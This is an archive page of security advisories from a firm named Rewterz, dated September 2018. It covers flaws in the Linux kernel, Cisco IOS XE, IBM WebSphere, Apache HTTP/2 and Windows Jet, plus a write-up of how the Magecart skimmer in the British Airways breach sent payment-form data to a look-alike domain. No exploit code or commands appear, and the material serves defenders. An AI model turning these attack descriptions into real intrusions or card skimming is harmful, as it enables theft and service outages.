Archive for September, 2018

Rewterz Threat Advisory – CVE-2018-17182 – Linux kernel “vmacache_flush_all()” Use-After-Free Vulnerability

Malicious local users may gain escalated privileges by exploiting a vulnerability in the Linux Kernel.

 

 

IMPACT:  HIGH

 

 

PUBLISH DATE:  28-09-2018

 

 

OVERVIEW

 

 

A security flaw in the Linux Kernel may be exploited to induce Denial of Service, Use-After-Free condition or to gain privileges. Updates are available for all the affected versions of the product.

 

 

ANALYSIS

 

 

A flaw was detected in the Linux Kernel by some researchers. When this vulnerability is exploited by an attacker, it may induce a Denial of Service condition. However, exploiting this vulnerability requires time because the vulnerability can only be triggered by processes that run for a long enough time to cause the overflow for a reference counter.

 

 

The vmacache_flush_all() function in mm/vmacache.c mishandles sequence number overflows. An attacker can trigger a use-after-free (and possibly gain privileges) via certain thread creation, map, unmap, invalidation, and dereference operations.

 

 

Exploitation of this vulnerability may have high impacts on the confidentiality, integrity and availability of the compromised device.

 

 

AFFECTED PRODUCTS

 

 

Linux Kernel 3.16.x

Linux Kernel 4.4.x

Linux Kernel 4.9.x

Linux Kernel 4.14.x

Linux Kernel 4.18.x

 

 

UPDATE

 

 

Update the following affected versions according to the suggested updates available.

 

 

Versions 4.18.x:

Update to version 4.18.9

 

 

Versions 4.14.x:

Update to version 4.14.71

 

 

Versions 4.9.x:

Update to version 4.9.128

 

 

Versions 4.4.x:

Update to version 4.4.157

 

 

Versions 3.16.x:

Update to version 3.16.58.

 

 

 

If you think you are a victim of a cyber-attack, immediately send an e-mail to info@rewterz.com.


Rewterz Threat Advisory – CVE-2018-0470 – Cisco IOS XE HTTP Packet Processing Denial of Service Vulnerability

A vulnerability has been reported in Cisco IOS XE, which can be exploited by malicious people to cause a DoS (Denial of Service).

 

 

IMPACT:  NORMAL

 

 

PUBLISH DATE:  27-09-2018

 

 

OVERVIEW

 

 

There’s an error within the web framework of Cisco IOS XE when processing HTTP packets. This error can be exploited by people with malicious intent to cause a buffer overflow via a specially crafted HTTP packet. This may cause Denial of Service. The vendor has released update for the vulnerability.

 

 

ANALYSIS

 

 

An unauthenticated remote attacker could cause a buffer overflow condition on an affected device by exploiting a vulnerability within the web framework of Cisco IOS XE software, resulting in a denial of service (DoS) condition.

 

 

When an attacker exploits the vulnerability, the affected software improperly parses malformed HTTP packets that are sent to an affected device for processing. Successful exploitation yields a buffer overflow resulting in a DOS condition.

 

However, successful exploitation requires the HTTP Server feature to be enabled.

 

 

AFFECTED PRODUCTS

 

 

Cisco IOS XE Denali 16.3.x

Cisco IOS XE 3.2.x

 

 

UPDATE

 

 

Please follow the vendor’s advisory on how to check the running version of your product, whether it’s affected or not, and the available updates.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180926-webdos

 

 

 

 

 

If you think you are a victim of a cyber-security attack. Immediately send an email to info@rewterz.com for a rapid response.


Rewterz Threat Advisory – CVE-2018-1820 – IBM WebSphere Portal Cross-Site Scripting Vulnerability

A vulnerability has been reported in IBM WebSphere Portal, which can be exploited by malicious people to conduct cross-site scripting attacks.

 

 

IMPACT:  NORMAL

 

 

PUBLISH DATE: 26-09-2018

 

 

OVERVIEW

 

 

An update is available for IBM WebSphere Portal, some versions of which were found vulnerable to cross-site scripting attacks.

 

 

ANALYSIS

 

 

Some versions of the IBM WebSphere Portal were found to be vulnerable. When people with malicious intent exploit this issue, they may launch cross-site scripting attacks on the Portal.

 

 

The error allows users to embed arbitrary JavaScript code in the Web User Interface.  Consequently, the intended functionality is changed, which may lead to disclosure of credentials within a trusted session. The vendor has now released updates for the affected versions.

 

 

AFFECTED PRODUCTS

 

 

IBM WebSphere Portal 8.x

(IBM WebSphere Portal    9.0.0.0 – 9.0.0.0 CF16, 8.5.0.0 – 8.5.0.0 CF16 and 8.0.0.0 – 8.0.0.1 CF23)

 

 

MITIGATION

 

 

There’s no mitigation or workaround for this vulnerability. However, updates are available that patch the vulnerability.

 

 

UPDATES

 

 

The vendor has released following updates for the affected products.

 

 

 

 

Follow this link for further help in installing updates.

https://www-01.ibm.com/support/docview.wss?uid=ibm10732287

 

 

If you think you are a victim of a cyberattack, immediately send an email to info@rewterz.com.


Rewterz Threat Advisory – CVE-2018-11763 – Apache HTTP Server SETTINGS Frames Denial of Service Vulnerability

A vulnerability has been reported in Apache HTTP Server, which can be exploited by malicious people to cause a DoS (Denial of Service).

 

 

IMPACT:  NORMAL

 

 

PUBLISH DATE: 26-09-2018

 

 

OVERVIEW

 

 

In Apache HTTP Server 2.4.17 to 2.4.34, an attacker could induce a Denial of Service by sending continuous SETTINGS frames of maximum size on an ongoing HTTP/2 connection. It will keep the connection busy and will prevent it from timing out. This can be abused for a DoS on the server. Only servers that have enabled the h2 protocol can be affected.

 

 

ANALYSIS

 

 

A vulnerability is found in some versions of the Apache HTTP Server that may lead to a Denial of Service condition. This error affects an unknown function of the component SETTINGS Frame Handler.

 

 

When handling SETTINGS frames of maximum size an ongoing HTTP/2 connection can be exploited. The connection won’t time out, and may cause Denial of Service. It impacts the availability of an organization.

 

 

However, successful exploitation of this error requires that h2 protocol is enabled in the server. This network vulnerability does not require any privileges or user interaction to be exploited.

 

 

 

AFFECTED PRODUCTS

 

 

Apache HTTP Server 2.4.x

 

(The vulnerability is reported in versions 2.4.34, 2.4.33, 2.4.30, 2.4.29, 2.4.28, 2.4.27, 2.4.26, 2.4.25, 2.4.23, 2.4.20, and 2.4.18.)

 

(The httpd packages in Red Hat Enterprise Linux 7 and earlier do not include support for HTTP/2 and hence are not affected by this issue.)

 

 

UPDATES

Update to version 2.4.35. Refer to links for further help.

http://httpd.apache.org/download.cgi

https://websiteforstudents.com/apache2-http-server-2-4-35-released-heres-how-to-install-upgrade-on-ubuntu-16-04-18-04-lts/

 

 

MITIGATION

Apart from updating to the patched version, another possible mitigation is to not enable the h2 protocol.

 

 

If you think you are a victim of a cyberattack, immediately send an email to info@rewterz.com.

 


Rewterz Threat Advisory – Microsoft Windows 7 Jet Database Engine Out-Of-Bounds Memory Access Vulnerability

A vulnerability has been reported in Microsoft Windows 7, which can be exploited by malicious people to execute remote code on system.

 

 

IMPACT:  NORMAL

 

 

PUBLISH DATE:  25-09-2018

 

 

OVERVIEW

 

 

A vulnerability in Microsoft Windows JET Database Engine could allow for remote code execution. A number of applications like Microsoft Access, Microsoft Visual Basic, and third-party applications get data access by the JET Database Engine. When this vulnerability is exploited successfully, it lets attackers execute a remote code in the context of the current process and misuse the privileges associated with the process.

 

 

It may involve installing programs; viewing, changing or deleting data; or even creating new accounts with full user privileges. Processes configured to have administrative privileges can be more harmful if exploited.

 

 

This attack however would require user interaction as it requires the targeted user to visit some malicious page or open a malicious file. The specific flaw exists within the management of indexes in the Jet database engine. Crafted data in a database file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code under the context of the current process.

 

 

ANALYSIS

 

 

This vulnerability is due to an out-of-bounds write error. Specifically, this issue exists within the management of indexes. When a user is convinced to open a specially crafted Jet data source via OLEDB, this vulnerability can be exploited.

 

 

Microsoft has already patched two other issues in the JET this September. The already patched bugs were buffer overflows; however, this additional bug is actually an out-of-bounds write, which can be triggered by opening a Jet data source via OLEDB.

 

 

When a user opens a specially crafted file containing data stored in the JET database format, the vulnerability is triggered.  This vulnerability may proceed to cause a Denial of Service (DoS).

 

This crash is yielded by the issue:

 

 

 

 

AFFECTED PRODUCTS

 

 

Microsoft Windows 7

 

(Note: Only Windows 7 has been confirmed vulnerable but the exploited component is included in all supported versions of Windows, including server editions.)

 

 

MITIGATION

 

 

No patch for the vulnerability has yet been released. It is expected that Microsoft will soon patch the vulnerability in the upcoming October patch release. Until then, vigilant behavior is the only solution to avoid falling victim to this vulnerability.

 

Zero Day Initiative also suggests that users should restrict interaction of the application with trusted and confidential files.

 

 

 

If you think you’re the victim of a cyber-attack, immediately send an email to info@rewterz.com.


British Airways faces Data Breach of 380,000 Accounts

A malicious JavaScript code had been planted within British Airway’s website, leading to data breach of around 380,000 accounts.

 

 

RELEASE DATE: September 14th, 2018

 

 

INCIDENT

 

 

Starting from August 21st, around 380,000 accounts have been compromised in a major data breach of British Airways, revealing customers’ information. Cybersecurity organization RiskIQ believes that the Magecart attackers were involved in the breach, who have previously been associated with the Ticketmaster UK breach, earlier this year.

 

The attackers were successful in obtaining names, street and email addresses, credit card numbers, expiry dates and security codes of the airline’s customers, which could potentially lead to theft from user accounts.

 

British Airways informed that all the payment information processed through the airline’s website and mobile app between August 21st and September 5th had been exposed.

 

 

ATTACK VECTOR

 

 

The evidence reveals that a malicious JavaScript code had been planted within British Airway’s website.

 

Magecart has traditionally stolen data by injecting the malicious script into payment forms.

 

RiskIQ further informed that hackers used only 22 lines of code to get a hold of the data. (attached below)

 

 

 

The attack compromised British Airways’ own Web server, making it a highly targeted attack that aimed for this particular website and its mobile Application.

 

“This skimmer is attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site in particular.” Yonathan Klijnsma, head researcher at RiskIQ said.

 

 

ROOT CAUSE

 

 

The Magecart’s association with the attack was identified because the attack is web-based and targeting credit card data. The attackers focused on the unique site structure and functionality of the British Airways website and exploited their security lapses. RiskIQ crawled the scripts on the British Airways’ site and traced how they changed over time. During the process, the researchers found a modified script in the compromised site.

 

The BA site is found to be utilizing a JavaScript library called an API, on a malicious Web server at baways.com. It’s a virtual private server hosted by a provider in Lithuania, using a TS certificate registered through Comodo (to appear legitimate) on August 15. The code was injected through the JavaScript library.

 

When a customer enters information on the website’s payment form and clicks “submit”, the 22-lines of code export the entered data to the malicious server as a JSON object.

 

The customer’s transaction is not disturbed and appears to be over a secure session while the attackers receive a full copy of the payment information. The attackers also added a “touchend” callback to the script, extending the attack to BA’s mobile App as well, which also called the same modified script.

 

 

LESSON LEARNED

 

 

The British Airways website seems to be operating without visibility into its Internet-facing web assets. Therefore, the British Airways could not detect this compromise and data breach until it was too late.

 

With so many attack vectors and ever-increasing techniques of cyber-attacks, organizations should make sure that they have an intact cybersecurity implementation. With proper measures, visibility and regular penetration testing, such attacks can be nipped in the bud before they cause any damage.

 


Copyright © Rewterz. All rights reserved.